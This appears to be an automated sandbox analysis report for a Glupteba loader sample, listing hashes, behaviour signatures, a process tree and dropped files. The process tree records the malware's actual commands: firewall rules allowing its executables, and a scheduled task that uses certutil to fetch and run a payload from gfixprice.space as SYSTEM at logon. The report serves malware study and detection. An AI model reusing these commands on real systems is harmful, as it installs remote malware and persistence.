Analysis

  • max time kernel
    52s
  • max time network
    177s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 22:19

General

  • Target

    b0e6f5dfcde3d7e2dc6a28c194f252d508d2ec470bf1a55f6f56f7270408e15f.exe

  • Size

    3.8MB

  • MD5

    3e7f6f4c33e07e55139d24f830407f0d

  • SHA1

    a5b53cc46bbda6335983072abc95fb04b951e6bd

  • SHA256

    b0e6f5dfcde3d7e2dc6a28c194f252d508d2ec470bf1a55f6f56f7270408e15f

  • SHA512

    dc7fce6d28e89bb781498fccced20883be17a035486ae3be87ce7cb5a02b7bfee4ede272a86241567d61709dda6283a09dcda13736d99fd5bc7d586989b34aad

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b0e6f5dfcde3d7e2dc6a28c194f252d508d2ec470bf1a55f6f56f7270408e15f.exe
    "C:\Users\Admin\AppData\Local\Temp\b0e6f5dfcde3d7e2dc6a28c194f252d508d2ec470bf1a55f6f56f7270408e15f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1160
    • C:\Users\Admin\AppData\Local\Temp\b0e6f5dfcde3d7e2dc6a28c194f252d508d2ec470bf1a55f6f56f7270408e15f.exe
      "C:\Users\Admin\AppData\Local\Temp\b0e6f5dfcde3d7e2dc6a28c194f252d508d2ec470bf1a55f6f56f7270408e15f.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3780
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
        3⤵
          PID:1432
        • C:\Windows\rss\csrss.exe
          C:\Windows\rss\csrss.exe ""
          3⤵
            PID:932
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:2388
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:2304
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
                PID:4440
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\Sysnative\bcdedit.exe /v
                4⤵
                • Modifies boot configuration data using bcdedit
                PID:4372
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4900
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          1⤵
            PID:3200
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
            1⤵
              PID:228

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              Filesize

              1.7MB

              MD5

              13aaafe14eb60d6a718230e82c671d57

              SHA1

              e039dd924d12f264521b8e689426fb7ca95a0a7b

              SHA256

              f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

              SHA512

              ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

            • C:\Windows\rss\csrss.exe
              Filesize

              3.8MB

              MD5

              3e7f6f4c33e07e55139d24f830407f0d

              SHA1

              a5b53cc46bbda6335983072abc95fb04b951e6bd

              SHA256

              b0e6f5dfcde3d7e2dc6a28c194f252d508d2ec470bf1a55f6f56f7270408e15f

              SHA512

              dc7fce6d28e89bb781498fccced20883be17a035486ae3be87ce7cb5a02b7bfee4ede272a86241567d61709dda6283a09dcda13736d99fd5bc7d586989b34aad

            • C:\Windows\rss\csrss.exe
              Filesize

              3.8MB

              MD5

              3e7f6f4c33e07e55139d24f830407f0d

              SHA1

              a5b53cc46bbda6335983072abc95fb04b951e6bd

              SHA256

              b0e6f5dfcde3d7e2dc6a28c194f252d508d2ec470bf1a55f6f56f7270408e15f

              SHA512

              dc7fce6d28e89bb781498fccced20883be17a035486ae3be87ce7cb5a02b7bfee4ede272a86241567d61709dda6283a09dcda13736d99fd5bc7d586989b34aad

            • memory/228-139-0x0000000000000000-mapping.dmp
            • memory/932-144-0x0000000000400000-0x00000000036C0000-memory.dmp
              Filesize

              50.8MB

            • memory/932-143-0x0000000005800000-0x0000000005BA6000-memory.dmp
              Filesize

              3.6MB

            • memory/932-140-0x0000000000000000-mapping.dmp
            • memory/1160-131-0x0000000005950000-0x0000000006045000-memory.dmp
              Filesize

              7.0MB

            • memory/1160-132-0x0000000000400000-0x00000000036C0000-memory.dmp
              Filesize

              50.8MB

            • memory/1160-130-0x00000000055A8000-0x000000000594E000-memory.dmp
              Filesize

              3.6MB

            • memory/1432-138-0x0000000000000000-mapping.dmp
            • memory/2024-133-0x0000000000000000-mapping.dmp
            • memory/2024-137-0x0000000000400000-0x00000000036C0000-memory.dmp
              Filesize

              50.8MB

            • memory/2024-134-0x0000000005422000-0x00000000057C8000-memory.dmp
              Filesize

              3.6MB

            • memory/2304-145-0x0000000000000000-mapping.dmp
            • memory/2388-146-0x0000000000000000-mapping.dmp
            • memory/3200-136-0x0000000000000000-mapping.dmp
            • memory/3780-135-0x0000000000000000-mapping.dmp
            • memory/4372-149-0x0000000000000000-mapping.dmp
            • memory/4440-147-0x0000000000000000-mapping.dmp